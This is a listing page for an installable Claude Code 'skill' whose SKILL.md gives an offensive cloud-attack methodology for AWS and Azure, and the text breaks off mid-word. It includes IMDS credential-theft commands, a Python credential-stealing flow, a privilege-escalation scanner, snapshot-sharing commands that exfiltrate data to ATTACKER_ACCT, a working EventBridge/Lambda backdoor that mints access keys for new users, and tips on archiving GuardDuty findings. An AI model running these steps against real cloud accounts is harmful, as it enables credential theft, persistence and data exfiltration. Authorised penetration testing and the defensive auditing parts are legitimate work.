ClaudeWave
Skill · 2.3k repo stars · updated 1mo ago

offensive-cloud

**offensive-cloud** is a comprehensive cloud security attack methodology covering AWS, Azure, and GCP that includes credential harvesting from instance metadata and environment variables, enumeration using cloud-native tools, privilege escalation through IAM policies and role assumptions, persistence mechanisms like backdoor accounts and Lambda layer hijacking, data exfiltration from cloud storage services, and detection evasion techniques. Use this skill during cloud infrastructure penetration testing engagements or when assessing compromised cloud credentials and cloud account security posture.

Install in Claude Code
git clone --depth 1 https://github.com/SnailSploit/Claude-Red /tmp/offensive-cloud && cp -r /tmp/offensive-cloud/Skills/cloud/offensive-cloud ~/.claude/skills/offensive-cloud
Then open a new Claude Code session; the skill loads automatically.

SKILL.md

# Cloud (AWS / Azure / GCP) — Offensive Testing Methodology

## Quick Workflow

1. Identify the cloud and the identity context you have (user, role, service account, instance role)
2. Enumerate without writes — `aws sts get-caller-identity`, `az account show`, `gcloud auth list`
3. Map permissions to known privilege-escalation primitives (PassRole, Owner, etc.)
4. Find the data and the persistence anchors before alarms fire
5. Document the kill chain with timestamps, identities, and resources for the report

---

## AWS

### Identity Discovery

```bash
aws sts get-caller-identity
# For a user ARN (arn:aws:iam::ACCOUNT:user/NAME) the last path element is the user name;
# for an assumed-role ARN it is the session name, so take the role name from the ARN instead
aws iam list-attached-user-policies --user-name $(aws sts get-caller-identity --query Arn --output text | awk -F/ '{print $NF}')
aws iam list-user-policies --user-name <user>            # inline policies are a separate call
aws iam list-attached-role-policies --role-name <role>
aws iam list-role-policies --role-name <role>
# The source ARN must be the IAM user/role ARN, not the sts assumed-role session ARN,
# and actions are named explicitly in service:Action form
aws iam simulate-principal-policy --policy-source-arn arn:aws:iam::<account>:role/<role> \
  --action-names iam:PassRole iam:CreatePolicyVersion lambda:CreateFunction ec2:RunInstances
```

### IMDS Credential Theft

```bash
# IMDSv1 (legacy)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>

# IMDSv2 (modern, requires token)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/
```

IMDSv2 is what breaks the classic SSRF-to-credentials chain: a session token is only issued for a `PUT` that carries the TTL header, every data request must then carry the token header, requests with an `X-Forwarded-For` header are refused, and the default response hop limit of 1 stops the reply from crossing a container or proxy boundary. A GET-only SSRF therefore gets nothing from an instance that enforces IMDSv2; it still works where IMDSv1 is allowed (the `HttpTokens: optional` setting, common on older instances) or where the gadget gives you control of both the method and the headers. Check the setting with `aws ec2 describe-instances --query 'Reservations[].Instances[].[InstanceId,MetadataOptions.HttpTokens]'`.
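The PUT-then-GET flow above, played out against a local mock. This is an added example, not part of the skill or of AWS: `MockIMDSv2` is a constructed stand-in that models only the IMDSv2 rules that matter for SSRF (token issued by `PUT` with the TTL header, token required on every `GET`, forwarded requests refused) and does not reproduce the real service's exact status codes; the role name and credential body are constructed values. `steal_creds_v2` is the attacker side of the exchange, and `ssrf_get_only` shows why a GET-only gadget comes back empty.

```python
import http.client
import secrets
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed role name and credential document served by the mock (not real keys)
ROLE = "web-instance-role"
CREDS = '{"AccessKeyId":"ASIAEXAMPLE","SecretAccessKey":"example","Token":"example"}'
TOKENS = set()  # session tokens the mock has issued


class MockIMDSv2(BaseHTTPRequestHandler):
    """Models the IMDSv2 rules that matter for SSRF; IMDSv1 (token-less GET) is disabled."""

    def log_message(self, *args):  # silence request logging
        pass

    def _send(self, code, body=""):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_PUT(self):
        # Token issuance: PUT to the token path with the TTL header; forwarded requests are refused
        if ("X-Forwarded-For" in self.headers or self.path != "/latest/api/token"
                or "X-aws-ec2-metadata-token-ttl-seconds" not in self.headers):
            return self._send(400)
        token = secrets.token_urlsafe(32)
        TOKENS.add(token)
        self._send(200, token)

    def do_GET(self):
        # Every data request must carry a token the mock issued
        if "X-Forwarded-For" in self.headers or self.headers.get("X-aws-ec2-metadata-token") not in TOKENS:
            return self._send(401)
        if self.path == "/latest/meta-data/iam/security-credentials/":
            return self._send(200, ROLE)
        if self.path == "/latest/meta-data/iam/security-credentials/" + ROLE:
            return self._send(200, CREDS)
        self._send(404)


def start_mock():
    """Start the mock on a random loopback port; returns the server (call .shutdown() when done)."""
    srv = HTTPServer(("127.0.0.1", 0), MockIMDSv2)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def imds_request(host, port, path, headers=None, method="GET"):
    """One request to the metadata endpoint; returns (status, body)."""
    conn = http.client.HTTPConnection(host, port, timeout=3)
    conn.request(method, path, headers=headers or {})
    resp = conn.getresponse()
    body = resp.read().decode()
    conn.close()
    return resp.status, body


def steal_creds_v2(host, port):
    """Full IMDSv2 flow: PUT for a token, then GET the role name and its credentials with it."""
    status, token = imds_request(host, port, "/latest/api/token",
                                 {"X-aws-ec2-metadata-token-ttl-seconds": "21600"}, method="PUT")
    if status != 200:
        return None
    auth = {"X-aws-ec2-metadata-token": token}
    _, role = imds_request(host, port, "/latest/meta-data/iam/security-credentials/", auth)
    status, creds = imds_request(host, port, "/latest/meta-data/iam/security-credentials/" + role, auth)
    return (role, creds) if status == 200 else None


def ssrf_get_only(host, port):
    """What a typical GET-only SSRF gadget gets: no PUT, no custom headers, so no credentials."""
    status, _ = imds_request(host, port, "/latest/meta-data/iam/security-credentials/")
    return status


if __name__ == "__main__":
    srv = start_mock()
    port = srv.server_address[1]
    print("IMDSv2 flow:", steal_creds_v2("127.0.0.1", port))
    print("GET-only SSRF status:", ssrf_get_only("127.0.0.1", port))
    srv.shutdown()
```

Point `imds_request` at `169.254.169.254` port 80 from inside an instance and the same two functions run against the real service; the mock exists so the difference between the two request shapes can be seen without one.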

### Privilege Escalation Paths

| Path | Required Permission | Outcome |
|------|---------------------|---------|
| `iam:PassRole` + `lambda:CreateFunction` + `lambda:InvokeFunction` (or a trigger) | Pass any role to a Lambda you create | Run code as that role |
| `iam:PassRole` + `ec2:RunInstances` | Pass any role to an EC2 instance, then read IMDS | Role creds |
| `iam:CreatePolicyVersion` (with `--set-as-default`) or `iam:SetDefaultPolicyVersion` | Edit or switch a policy attached to you | Self-elevate |
| `iam:UpdateAssumeRolePolicy` | On a privileged role | Add yourself as a trusted principal |
| `iam:CreateLoginProfile` / `iam:UpdateLoginProfile` | Set a console password for a user | Console access |
| `iam:CreateAccessKey` (on another user) | Mint keys for someone else | Persistent access |
| `sts:AssumeRole` + `sts:TagSession` to an ABAC role | If the role's policies key on session tags | Tag-based escalation |
| `cloudformation:CreateStack` + `iam:PassRole` on a permissive role | Stack resources are created as that role | Indirect arbitrary perms |
| `glue:UpdateDevEndpoint` | Inject an SSH key into a Glue dev endpoint | Code exec as the Glue role |
| `ssm:SendCommand` to any instance | RCE on instances and their roles | Lateral + escalation |

```bash
# Pacu — the tooling for AWS escalation
pacu
> import_keys default
> run iam__enum_permissions
> run iam__privesc_scan
```
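An offline check of the table above against a set of allowed actions, as an added example (not Pacu and not the skill's code). The input is whatever you have established the identity can do, for instance the `allowed` results of `simulate-principal-policy`; the matcher applies IAM wildcard semantics (`*`, `lambda:*`, `iam:Create*`, case-insensitive) so a broad grant is recognised for the specific actions a path needs. Resource scoping, conditions and explicit Deny statements are not modelled, so a hit here is a lead to confirm, not a proof. The sample policy and simulation output are constructed.

```python
import fnmatch

# Escalation primitives from the table: every action listed must be allowed for the path to apply
PRIVESC_PATHS = {
    "Lambda with passed role":        ["iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction"],
    "EC2 with passed role (IMDS)":    ["iam:PassRole", "ec2:RunInstances"],
    "New policy version on self":     ["iam:CreatePolicyVersion"],
    "Set default policy version":     ["iam:SetDefaultPolicyVersion"],
    "Edit role trust policy":         ["iam:UpdateAssumeRolePolicy"],
    "Console password for a user":    ["iam:CreateLoginProfile"],
    "Access key for another user":    ["iam:CreateAccessKey"],
    "CloudFormation with passed role": ["iam:PassRole", "cloudformation:CreateStack"],
    "Glue dev endpoint SSH key":      ["glue:UpdateDevEndpoint"],
    "SSM RunCommand on instances":    ["ssm:SendCommand"],
}


def action_allowed(action, allowed):
    """True if `action` is matched by any allowed pattern; IAM action matching is case-insensitive
    and uses * as the only wildcard, which fnmatch covers for these strings."""
    wanted = action.lower()
    return any(fnmatch.fnmatchcase(wanted, pattern.lower()) for pattern in allowed)


def find_privesc_paths(allowed):
    """Names of the escalation paths whose required actions are all allowed, in table order."""
    return [name for name, required in PRIVESC_PATHS.items()
            if all(action_allowed(act, allowed) for act in required)]


def parse_simulation(results):
    """Allowed action names from a simulate-principal-policy response (the CLI's JSON shape)."""
    return {r["EvalActionName"] for r in results.get("EvaluationResults", [])
            if r.get("EvalDecision") == "allowed"}


# Constructed sample: a developer grant that looks harmless but passes roles to Lambda
SAMPLE_ALLOWED = ["lambda:*", "iam:PassRole", "s3:GetObject", "ec2:Describe*"]

# Constructed simulate-principal-policy output, shape as the CLI prints it
SAMPLE_SIMULATION = {"EvaluationResults": [
    {"EvalActionName": "iam:CreateAccessKey", "EvalDecision": "allowed"},
    {"EvalActionName": "iam:CreateUser", "EvalDecision": "implicitDeny"},
]}

if __name__ == "__main__":
    print(find_privesc_paths(SAMPLE_ALLOWED))
    print(find_privesc_paths(parse_simulation(SAMPLE_SIMULATION)))
```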

### Cross-Account / Organization

```bash
# Every role carries a trust policy; dump them and look for principals from other accounts
# (pivot targets into this account, or evidence of which external accounts matter)
aws iam list-roles --query 'Roles[].[RoleName,AssumeRolePolicyDocument]' --output json
# Then grep each AssumeRolePolicyDocument.Statement[].Principal.AWS for account IDs that are not this account, or "*"

# Roles in other accounts that trust you cannot be listed from here; probe likely names directly
aws sts assume-role --role-arn arn:aws:iam::<target-account>:role/<role> --role-session-name probe

# Org-wide (if Organizations access)
aws organizations list-accounts
aws organizations list-roots
```
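The grep step above, done properly, as an added example that is not part of the skill. `external_trusts` takes the JSON that `aws iam list-roles` prints plus the account ID from `get-caller-identity` and reports every `Allow` / `sts:AssumeRole` statement whose AWS principal is a foreign account or a wildcard, noting whether a `Condition` (typically `sts:ExternalId`) guards it. It handles the single-string-vs-list shapes IAM allows and the URL-encoded document the raw API returns; service principals such as `ec2.amazonaws.com` are deliberately ignored. The role list is constructed for account `123456789012`.

```python
import json
import re
from urllib.parse import quote, unquote

ACCOUNT_ID = re.compile(r"\d{12}")


def trust_document(role):
    """The API returns the trust policy URL-encoded; the CLI usually decodes it. Accept both."""
    doc = role["AssumeRolePolicyDocument"]
    return json.loads(unquote(doc)) if isinstance(doc, str) else doc


def as_list(value):
    """IAM lets single-valued elements be a bare string instead of a one-element list."""
    return [value] if isinstance(value, str) else list(value or [])


def aws_principals(principal):
    """AWS principals (accounts, users, roles or '*') from a Principal element; service principals are ignored."""
    if principal == "*":
        return ["*"]
    return as_list(principal.get("AWS")) if isinstance(principal, dict) else []


def external_trusts(list_roles_output, own_account):
    """(role_name, principal, has_condition) for every Allow sts:AssumeRole statement whose
    AWS principal is a different account or a wildcard."""
    findings = []
    for role in list_roles_output["Roles"]:
        statements = trust_document(role)["Statement"]
        if isinstance(statements, dict):
            statements = [statements]
        for st in statements:
            if st.get("Effect") != "Allow" or "sts:AssumeRole" not in as_list(st.get("Action")):
                continue
            for principal in aws_principals(st.get("Principal", {})):
                acct = ACCOUNT_ID.search(principal)
                if principal == "*" or (acct and acct.group(0) != own_account):
                    findings.append((role["RoleName"], principal, "Condition" in st))
    return findings


def _trust(principal, action="sts:AssumeRole", condition=None):
    """Helper to build constructed trust policies for the sample below."""
    st = {"Effect": "Allow", "Principal": principal, "Action": action}
    if condition:
        st["Condition"] = condition
    return {"Version": "2012-10-17", "Statement": [st]}


# Constructed list-roles output for account 123456789012; the last role carries the
# URL-encoded form to exercise the raw-API case
SAMPLE_LIST_ROLES = {"Roles": [
    {"RoleName": "ec2-app", "AssumeRolePolicyDocument": _trust({"Service": "ec2.amazonaws.com"})},
    {"RoleName": "vendor-access", "AssumeRolePolicyDocument": _trust({"AWS": "arn:aws:iam::111111111111:root"})},
    {"RoleName": "internal-ops", "AssumeRolePolicyDocument": _trust(
        {"AWS": ["arn:aws:iam::123456789012:role/ops"]}, ["sts:AssumeRole", "sts:TagSession"])},
    {"RoleName": "saas-integration", "AssumeRolePolicyDocument": quote(json.dumps(_trust(
        {"AWS": "*"}, condition={"StringEquals": {"sts:ExternalId": "abc"}})))},
]}

if __name__ == "__main__":
    for name, who, conditioned in external_trusts(SAMPLE_LIST_ROLES, "123456789012"):
        print(f"{name}: trusts {who}{' (with Condition)' if conditioned else ''}")
```

A `*` principal with an `sts:ExternalId` condition is the normal SaaS-vendor pattern; the finding is still worth a line in the report, because the external ID is only as secret as the vendor keeps it.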

### Data Targets

```bash
# S3
aws s3api list-buckets
aws s3 ls s3://<bucket> --recursive | head
aws s3api get-bucket-policy --bucket <bucket>

# Cross-account snapshot share (data exfil without touching S3)
aws ec2 describe-snapshots --owner-ids self --query 'Snapshots[].[SnapshotId,Encrypted,KmsKeyId]'
aws ec2 modify-snapshot-attribute --snapshot-id snap-... \
  --attribute createVolumePermission \
  --create-volume-permission "Add=[{UserId=ATTACKER_ACCT}]"
# Encrypted snapshots also need the attacker account in the CMK key policy;
# snapshots encrypted with the AWS-managed default key cannot be shared at all

# RDS snapshot share (manual snapshots only; copy an automated snapshot first)
aws rds modify-db-snapshot-attribute --db-snapshot-identifier mysnap \
  --attribute-name restore --values-to-add ATTACKER_ACCT

# Secrets Manager / Parameter Store
aws secretsmanager list-secrets
aws ssm get-parameters-by-path --path / --recursive --with-decryption
```

### Persistence

```bash
# SCPs do not apply to service-linked roles, so automation that runs through one
# is not held back by org guardrails
# AWS Config delivery channel rerouted so configuration snapshots land in an attacker bucket
aws configservice put-delivery-channel ...  # Rare but devastating

# EventBridge rule on CloudTrail IAM events (CreateUser, AttachUserPolicy) firing a Lambda you control
# Backdoor: the Lambda creates an access key for any new admin user and hands it to the operator
```
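The EventBridge backdoor sketched in the comments above, spelled out as an added example (not the skill's own code). `RULE_PATTERN` is the event pattern the rule would carry, assuming CloudTrail management events reach the default event bus; `handler` is the Lambda target, which assumes an execution role allowed `iam:CreateAccessKey`. The IAM client is passed in rather than created, so the handler can be exercised offline against the constructed `FakeIAM` below (in Lambda it would be `boto3.client("iam")`); `pattern_matches` reimplements the slice of EventBridge matching the rule relies on so the pairing of pattern and event can be checked before deploying. Both sample events are constructed.

```python
# Event pattern for the EventBridge rule: IAM CreateUser calls recorded by CloudTrail
RULE_PATTERN = {
    "source": ["aws.iam"],
    "detail-type": ["AWS API Call via CloudTrail"],
    "detail": {"eventSource": ["iam.amazonaws.com"], "eventName": ["CreateUser"]},
}


def pattern_matches(pattern, event):
    """EventBridge matching for the subset used here: nested objects recurse, a leaf list
    must contain the event's value, and a key missing from the event never matches."""
    for key, want in pattern.items():
        if key not in event:
            return False
        if isinstance(want, dict):
            if not isinstance(event[key], dict) or not pattern_matches(want, event[key]):
                return False
        elif event[key] not in want:
            return False
    return True


def target_user(event):
    """Name of the user just created, or None for failed calls and unrelated events."""
    detail = event.get("detail", {})
    if detail.get("eventName") != "CreateUser" or detail.get("errorCode"):
        return None
    return detail.get("requestParameters", {}).get("userName")


def handler(event, context, iam):
    """Lambda entry point: mint an access key for the new user; returns the key id or None."""
    user = target_user(event)
    if user is None:
        return None
    resp = iam.create_access_key(UserName=user)
    # An implant would deliver resp["AccessKey"] to the operator's collection point here
    return resp["AccessKey"]["AccessKeyId"]


class FakeIAM:
    """Constructed stand-in for the boto3 IAM client so the handler runs offline."""

    def __init__(self):
        self.created = []

    def create_access_key(self, UserName):
        self.created.append(UserName)
        return {"AccessKey": {"UserName": UserName, "AccessKeyId": "AKIAFAKE%04d" % len(self.created)}}


# Constructed events in the shape EventBridge delivers for CloudTrail management events
SAMPLE_CREATE = {
    "source": "aws.iam",
    "detail-type": "AWS API Call via CloudTrail",
    "detail": {"eventSource": "iam.amazonaws.com", "eventName": "CreateUser",
               "requestParameters": {"userName": "new-admin"}},
}
SAMPLE_FAILED = {
    "source": "aws.iam",
    "detail-type": "AWS API Call via CloudTrail",
    "detail": {"eventSource": "iam.amazonaws.com", "eventName": "CreateUser",
               "errorCode": "AccessDenied", "requestParameters": {"userName": "nope"}},
}

if __name__ == "__main__":
    iam = FakeIAM()
    print(pattern_matches(RULE_PATTERN, SAMPLE_CREATE), handler(SAMPLE_CREATE, None, iam))
```

The same rule, with `AttachUserPolicy` or `CreateLoginProfile` added to `eventName`, is exactly what a defender's alerting looks like from the other side; the difference is only what the target does with the event.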

### Detection Evasion

- CloudTrail: stopping a trail (`cloudtrail stop-logging`), deleting it, or turning off log-file validation needs `cloudtrail:*` rights, is itself recorded, and is a standard alert in most SOCs; an organization trail is managed from the management account and cannot be altered from a member account at all
- GuardDuty: findings can be archived (`guardduty archive-findings`) or auto-suppressed with a filter (`guardduty create-filter --action ARCHIVE`) only with those permissions, which production roles rarely hold; `update-findings-feedback` records useful/not-useful feedback and hides nothing
- VPC Flow Logs only see IP traffic; control-plane API calls appear in CloudTrail alone, and S3/Lambda data events only if data-event logging is switched on

---

## Azure

### Identity Discovery

```bash
az account show
az ad signed-in-user show
az role assignment list --all --assignee $(az ad signed-in-user show --query id -o tsv)

# Microsoft Graph
az rest --method GET --uri "https://graph.microsoft.com/v1.0/me"
```

### IMDS

```bash
curl -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
```

### Privilege Escalation Paths

| Path | Required Role / Permission | Outcome |
|------|---------------------------|---------|
| User Access Administrator on the subscription | Assign yourself Owner | Subscription Owner |
| App Registration / service principal owner | Add a cert or secret, mint app-only tokens | The app's permissions |
| Virtual Machine Contributor on a VM with a managed identity | Run Command on the VM, pull the identity's token from IMDS | Whatever that identity reaches (Key Vault secrets, for instance) |
| Custom role with `*/write` or `Microsoft.Authorization/roleAssignments/write` | Edit role assignments | Self-elevate |
| Logic App Contributor | Edit the workflow to run a privileged action under its connections or identity | Indirect any action |
| Automation Account Contributor | Runbook executes under the Run As / managed identity | Run as that identity |
| AAD `Application Administrator` | Add a credential to an existing app or service principal that already holds privileged roles or Graph app permissions | Cloud admin via the app |
| AAD `Cloud Application Administrator` | Same, without Application Proxy rights | Cloud admin via the app |
| AAD Connect server (on-prem `MSOL_*` account, which holds the `Directory Synchronization Accounts` role in AAD) | The on-prem account has replication rights | DCSync: all on-prem hashes |
| Privileged Authentication Administrator | Reset passwords and auth methods for any user, Global Admins included | Global Admin takeover |

```bash
# ROADtools — the AAD enumeration toolkit
roadrecon auth -u user@tenant -p pass
roadrecon gather
roadrecon gui  # browse the gathered DB

# AzureHou